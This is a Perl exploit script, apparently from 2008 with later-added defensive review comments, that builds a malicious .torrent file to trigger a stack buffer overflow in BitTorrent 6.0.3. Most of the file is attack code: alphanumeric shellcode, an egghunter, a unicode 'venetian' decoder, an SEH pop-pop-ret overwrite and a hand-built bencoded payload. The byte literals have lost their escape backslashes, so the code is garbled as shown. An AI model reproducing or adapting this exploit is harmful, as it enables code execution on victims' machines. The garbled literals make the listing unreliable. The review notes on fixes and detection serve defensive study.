
bittorrent-overflow.txt

Posted on 21 October 2008

#!/usr/bin/perl
# BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit
# 09/21/2008 by k`sOSe && oVeret
#
# Review notes (defensive reading of this listing):
# - Trigger: the bencoded "comment" and "created by" string fields are
#   written below as <length>:<bytes> with a length the file author chooses,
#   and "created by" carries several hundred bytes of repeated two-byte
#   values. The title names the class as a stack buffer overflow, so the
#   parser-side fix is to bound the copy of every bencoded string by the
#   destination buffer size rather than by the declared length.
# - The author's own comments ("unicode friendly", "venetian decoder",
#   "pop,pop,ret") suggest the field is widened to UTF-16 before it is
#   copied and that control is taken through an exception-handler overwrite;
#   SafeSEH/SEHOP, DEP and stack cookies are the platform mitigations for
#   that class. Neither the vulnerable parser nor the target build is shown
#   here, so treat this as inference from the comments.
# - Detection: a .torrent whose "comment" or "created by" strings are
#   hundreds of bytes of repeating two-byte patterns, or whose "created by"
#   length prefix exceeds a few dozen bytes, is not produced by a normal
#   client and is a cheap thing to flag in a file scanner.
# - NOTE(review): the byte-string literals in this copy appear to have lost
#   their escape backslashes during extraction (each "xNN" reads as three
#   ASCII characters), so the listing is a historical record of the
#   technique, not a runnable script as shown.
use warnings;
use strict;

# If you change this(avoid x80->x9f unless you really know what you are doing) you must also change the length value of the decoder
# Stage payload as generated by the author's tooling; the alpha_mixed
# encoding keeps every byte in the printable range the author lists.
my $shellcode =
# windows/exec CMD="C:WINDOWSsystem32calc.exe"
#[*] x86/alpha_mixed succeeded, final size 337
"x49x49x49x49x49x49x49x49x49x49x49x49x49x49" .
"x49x49x49x37x51x5ax6ax41x58x50x30x41x30x41" .
"x6bx41x41x51x32x41x42x32x42x42x30x42x42x41" .
"x42x58x50x38x41x42x75x4ax49x4bx4cx4bx58x51" .
"x54x43x30x45x50x45x50x4cx4bx51x55x47x4cx4c" .
"x4bx43x4cx45x55x44x38x43x31x4ax4fx4cx4bx50" .
"x4fx42x38x4cx4bx51x4fx47x50x43x31x4ax4bx51" .
"x59x4cx4bx50x34x4cx4bx43x31x4ax4ex46x51x49" .
"x50x4ax39x4ex4cx4bx34x49x50x42x54x43x37x49" .
"x51x48x4ax44x4dx45x51x48x42x4ax4bx4cx34x47" .
"x4bx50x54x47x54x43x34x43x45x4dx35x4cx4bx51" .
"x4fx51x34x45x51x4ax4bx42x46x4cx4bx44x4cx50" .
"x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4cx4bx45" .
"x4cx4cx4bx45x51x4ax4bx4dx59x51x4cx46x44x45" .
"x54x48x43x51x4fx46x51x4bx46x45x30x46x36x45" .
"x34x4cx4bx47x36x50x30x4cx4bx51x50x44x4cx4c" .
"x4bx44x30x45x4cx4ex4dx4cx4bx45x38x45x58x4d" .
"x59x4bx48x4dx53x49x50x42x4ax50x50x45x38x4a" .
"x50x4cx4ax43x34x51x4fx45x38x4cx58x4bx4ex4c" .
"x4ax44x4ex50x57x4bx4fx4ax47x50x43x46x5ax51" .
"x4cx46x37x50x49x50x4ex51x54x50x4fx50x57x50" .
"x53x51x4cx42x53x43x49x44x33x44x34x45x35x42" .
"x4dx50x33x46x52x51x4cx42x43x43x51x42x4cx45" .
"x33x46x4ex43x55x42x58x42x45x43x30x44x4ax41" .
"x41";

# Marker appended to the payload so the search stub below can locate it.
$shellcode .= "x87x87"; # -> x21x20x21x20 -> EGG ( for english windows version )

# Two-byte value repeated to fill the overflowed field; the author notes it
# is a "pop,pop,ret" address, i.e. the overwritten handler target.
my $ret = "x3fx41"; # -> unicode friendly pop,pop,ret

# unicode friendly get_EIP (needed by the venetian decoder)
# Returns the first-stage stub as a byte string; the disassembly below is
# the author's annotation of how the widened bytes execute.
sub get_eip {
#0041 00 ADD BYTE PTR DS:[ECX],AL
#5F POP EDI
#0041 00 ADD BYTE PTR DS:[ECX],AL
#5F POP EDI
#0041 00 ADD BYTE PTR DS:[ECX],AL
#6A 00 PUSH 0
#58 POP EAX
#0041 00 ADD BYTE PTR DS:[ECX],AL
#57 PUSH EDI
#0041 00 ADD BYTE PTR DS:[ECX],AL
#54 PUSH ESP
#0041 00 ADD BYTE PTR DS:[ECX],AL
#5A POP EDX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#43 INC EBX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#58 POP EAX
#0041 00 ADD BYTE PTR DS:[ECX],AL
"x5fx41x5fx41x6ax58x41x57x41x54x41x5a" .
"x42x40" x 12 .    # the twelve INC EAX pairs annotated above
"x42x43" .
"x42x58x41";
}

# Returns the search stub that scans memory for the two-byte marker
# appended to $shellcode above (author's disassembly follows).
sub egghunter {
#6A01 PUSH 1
#5E POP ESI
#4E DEC ESI (=0)
#6A72 PUSH 72 <- starts from 0x00720000
#56 PUSH ESI
#4C DEC ESP
#4C DEC ESP
#5E POP ESI
#5E POP ESI <- ESI == 0x00720000
#BA21202120 /MOV EDX,20212021 <- egg
#46 |INC ESI
#3B16 |CMP EDX,DWORD PTR DS:[ESI]
#75FB JNZ SHORT egghunter
"x6Ax01x5Ex4Ex6Ax72x56x4Cx4Cx5Ex5ExBAx21x20x21x20x46x3Bx16x75xFB";
}

# this will decode the unicode expanded shellcode pushing it to the stack and then execute it
# Note that egghunter() and decoder() are defined but never called in this
# script; the author's comment on venetian_decoder() says their encoded form
# is embedded in that function's literal instead.
sub decoder {
#46 INC ESI
#6A01 PUSH 1
#6801010155 PUSH 0x55010101
#4C DEC ESP
#5B POP EBX
#5B POP EBX
#AD /LODS DWORD PTR DS:[ESI]
#50 |PUSH EAX
#44 |INC ESP
#44 |INC ESP
#44 |INC ESP
#4E |DEC ESI
#4E |DEC ESI
#4E |DEC ESI
#4E |DEC ESI
#4E |DEC ESI
#4E |DEC ESI
#4B |DEC EBX
#83FB01 |CMP EBX,1
#75EF JNE SHORT decoder
#54 PUSH ESP
#59 POP ECX
#4C DEC ESP -> realign
#51 PUSH ECX
#C3 RET
"x46x6Ax01x68x01x01x01x55x4Cx5Bx5BxADx50x44x44x44x4Ex4Ex4Ex4Ex4Ex4Ex4Bx83xFBx01x75xEFx54x59x4cx51xc3";
}

# venetian decoder + venetian encoded egghunter and decoder
# Returns the second-stage byte string that follows the get_eip() stub in the
# overflowed field; its contents are opaque here beyond the author's comment.
sub venetian_decoder {
"x05x03x01x71x2Dx01x01x71x40x71xC6x01x71x40x71x40".
"x71xC6x4Ex71x40x71x40x71xC6x72x71x40x71x40x71xC6".
"x4Cx71x40x71x40x71xC6x5Ex71x40x71x40x71xC6xBAx71".
"x40x71x40x71xC6x20x71x40x71x40x71xC6x20x71x40x71".
"x40x71xC6x3Bx71x40x71x40x71xC6x75x71x40x71x40x71".
"xC6x46x71x40x71x40x71xC6x01x71x40x71x40x71xC6x01".
"x71x40x71x40x71xC6x01x71x40x71x40x71xC6x4Cx71x40".
"x71x40x71xC6x5Bx71x40x71x40x71xC6x50x71x40x71x40".
"x71xC6x44x71x40x71x40x71xC6x4Ex71x40x71x40x71xC6".
"x4Ex71x40x71x40x71xC6x4Ex71x40x71x40x71xC6x4Bx71".
"x40x71xFExFEx40x71xC6xFBx71x40x71x40x71xC6x75x71".
"x40x71x40x71xC6x54x71x40x71x40x71xC6x4Cx71x40x71".
"x40x71xC6xC3x71x40x71x04x04x04x04x04x04x04x04x04".
"x04x04x04x04x04x04x04x04x04x04x04x04x04x04x04x04".
"x04x04x04x04x04x04x04x04x04x04x04x04x04x04x04x04".
"x04x04x04x04x04x04x04x04x04x04x04x04x04x04x04x04".
"x6Ax5Ex6Ax56x4Cx5Ex21x21x46x16xFBx6Ax68x01x55x5B".
"xADx44x44x4Ex4Ex4Ex81x01xEFx59x51";
}

# The over-long "created by" value: 192 copies of $ret, then the two stubs.
# Its length is whatever this concatenation yields; the parser on the other
# side is what must refuse to copy it into a fixed-size stack buffer.
my $stack_buffer = $ret x 192 .
get_eip() . venetian_decoder();

# Two-arg open on a bareword handle. The filename is a constant here, so
# there is no mode-injection exposure, but the modern form is
# three-arg open with a lexical handle and the error text should include $!.
open(HANDLE, "> torrent.torrent") || die "Error! ";

# Bencoded dictionary written by hand. Every string is emitted as
# <length>:<bytes>, so "comment" and "created by" reach the parser with
# exactly the lengths computed from the payload strings above; the other
# keys (announce, creation date, encoding, info) are ordinary filler.
print HANDLE "d8:announce17:http://qwerty.qwe7:comment" . length($shellcode) .":" . $shellcode .
"10:created by" . length($stack_buffer) . ":" . $stack_buffer .
"13:creation datei1218555046e8:encoding10:iso-8859-14:infod6:lengthi1e4:name6:bu.txt12:piece lengthi65536e6:pieces20:".
"x86xf7xe4x37xfaxa5xa7xfcxe1x5dx1dxdcxb9xeaxeaxeax37x76x67xb8x65x65x0a";

# Unchecked close on a write handle: buffered write errors would be lost.
close (HANDLE);

 
